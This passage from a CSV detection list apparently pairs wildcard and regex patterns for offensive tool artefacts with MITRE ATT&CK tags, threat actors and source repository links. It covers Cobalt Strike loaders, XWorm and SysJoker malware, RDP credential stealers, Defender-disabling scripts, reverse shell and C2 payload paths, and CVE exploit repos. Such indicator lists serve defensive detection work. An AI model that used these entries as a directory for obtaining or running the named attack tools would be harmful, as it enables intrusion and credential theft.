performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/xml_attacks.txt*",".{0,1000}\/xml_attacks\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/xmlrpc-methods.nse*",".{0,1000}\/xmlrpc\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/xmpp-brute.nse*",".{0,1000}\/xmpp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/xmpp-info.nse*",".{0,1000}\/xmpp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/xndpxs/CVE-2022-0847*",".{0,1000}\/xndpxs\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/xndpxs/CVE-2022-0847","1","1","N/A","N/A","1","9","7","2022-03-07T17:59:12Z","2022-03-07T17:51:02Z" "*/xor/stager.txt*",".{0,1000}\/xor\/stager\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","279","59","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" "*/xor/xor.go*",".{0,1000}\/xor\/xor\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","279","59","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" "*/XOR_b64_encrypted/*",".{0,1000}\/XOR_b64_encrypted\/.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*/XorObfuscation.cs*",".{0,1000}\/XorObfuscation\.cs.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*/xpath_injection.txt*",".{0,1000}\/xpath_injection\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/xPipe/*",".{0,1000}\/xPipe\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","78","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "*/XRulez binaries.zip*",".{0,1000}\/XRulez\sbinaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" 
"*/XRulez.exe*",".{0,1000}\/XRulez\.exe.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*/XRulez.zip*",".{0,1000}\/XRulez\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*/xss_robertux.txt*",".{0,1000}\/xss_robertux\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/XWorm.exe*",".{0,1000}\/XWorm\.exe.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","1","N/A","10","1","21","10","2023-10-03T01:34:12Z","2023-10-03T01:27:37Z" "*/XWorm.exe*",".{0,1000}\/XWorm\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - 
Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/XWorm.rar*",".{0,1000}\/XWorm\.rar.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","N/A","10","1","21","10","2023-10-03T01:34:12Z","2023-10-03T01:27:37Z" "*/XWorm.zip*",".{0,1000}\/XWorm\.zip.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/XWorm-RAT-V*",".{0,1000}\/XWorm\-RAT\-V.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/xxe_fuzz.txt*",".{0,1000}\/xxe_fuzz\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/yanghaoi/_CNA*",".{0,1000}\/yanghaoi\/_CNA.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/ysoserial.jar*",".{0,1000}\/ysoserial\.jar.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" 
"*/ysoserial/*",".{0,1000}\/ysoserial\/.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*/zejius/2HZG41Zw/6Vtmo6w4yQ5tnsBHms64.php*",".{0,1000}\/zejius\/2HZG41Zw\/6Vtmo6w4yQ5tnsBHms64\.php.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/zejius/2HZG41Zw/fJsnC6G4sFg2wsyn4shb.bin*",".{0,1000}\/zejius\/2HZG41Zw\/fJsnC6G4sFg2wsyn4shb\.bin.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/zejius/5GPR0iy9/6Vtmo6w4yQ5tnsBHms64.php*",".{0,1000}\/zejius\/5GPR0iy9\/6Vtmo6w4yQ5tnsBHms64\.php.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" 
"*/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin*",".{0,1000}\/zejius\/5GPR0iy9\/fJsnC6G4sFg2wsyn4shb\.bin.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/zerologon.cna*",".{0,1000}\/zerologon\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","152","42","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" "*/zerologon.py*",".{0,1000}\/zerologon\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation 
tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*/zerologon.py*",".{0,1000}\/zerologon\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/zhzyker/CVE-2020-5902*",".{0,1000}\/zhzyker\/CVE\-2020\-5902.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/zhzyker/CVE-2020-5902/","1","0","N/A","N/A","1","14","8","2020-07-08T04:10:12Z","2020-07-08T04:02:07Z" "*/ZipExec -*",".{0,1000}\/ZipExec\s\-.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","9","10","993","156","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z" "*/ZipExec.git*",".{0,1000}\/ZipExec\.git.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","1","N/A","9","10","993","156","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z" "*/ZipExec@latest*",".{0,1000}\/ZipExec\@latest.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","1","N/A","9","10","993","156","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z" 
"*/zsh_executor/*.go*",".{0,1000}\/zsh_executor\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*/zwjjustdoit/cve-2022-23131*",".{0,1000}\/zwjjustdoit\/cve\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0002 - TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/zwjjustdoit/cve-2022-23131","1","1","N/A","N/A","1","0","4","2022-02-21T04:55:57Z","2022-02-21T02:42:23Z" "*: Defeat-Defender-V1.2.0*",".{0,1000}\:\s\sDefeat\-Defender\-V1\.2\.0.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*://wstunnel.server.com*",".{0,1000}\:\/\/wstunnel\.server\.com.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*:: Remove (s)AINT folder*",".{0,1000}\:\:\sRemove\s\(s\)AINT\sfolder.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - 
T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*-:[GreenwooD]:- WinX Shell*",".{0,1000}\-\:\[GreenwooD\]\:\-\sWinX\sShell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*:\ProgramData\demo.dll*",".{0,1000}\:\\ProgramData\\demo\.dll.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","7","3","215","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z" "*:\ProgramData\RecoverySystem\recoveryWindows.zip*",".{0,1000}\:\\ProgramData\\RecoverySystem\\recoveryWindows\.zip.{0,1000}","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*:\ProgramData\SystemData\igfxCUIService.exe*",".{0,1000}\:\\ProgramData\\SystemData\\igfxCUIService\.exe.{0,1000}","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation 
tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*:\ProgramData\SystemData\tempo1.txt*",".{0,1000}\:\\ProgramData\\SystemData\\tempo1\.txt.{0,1000}","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*:\ProgramData\SystemData\tempo2.txt*",".{0,1000}\:\\ProgramData\\SystemData\\tempo2\.txt.{0,1000}","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*:\users\public\*.bat*",".{0,1000}\:\\users\\public\\.{0,1000}\.bat.{0,1000}","offensive_tool_keyword","_","scripts in public user folder","T1036 - T1055 - T1574","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*:\users\public\*.ps1*",".{0,1000}\:\\users\\public\\.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","_","scripts in public user folder","T1036 - T1055 - T1574","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*:\users\public\*.vbs*",".{0,1000}\:\\users\\public\\.{0,1000}\.vbs.{0,1000}","offensive_tool_keyword","_","scripts in public user folder","T1036 - T1055 - T1574","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" 
"*:\Users\Public\Music\*.dll*",".{0,1000}\:\\Users\\Public\\Music\\.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*:'123pentest'*",".{0,1000}\:\'123pentest\'.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*:8070/reverseShellClients*",".{0,1000}\:8070\/reverseShellClients.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*:8080/yara/file*",".{0,1000}\:8080\/yara\/file.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*:8999/Payloads/*",".{0,1000}\:8999\/Payloads\/.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - 
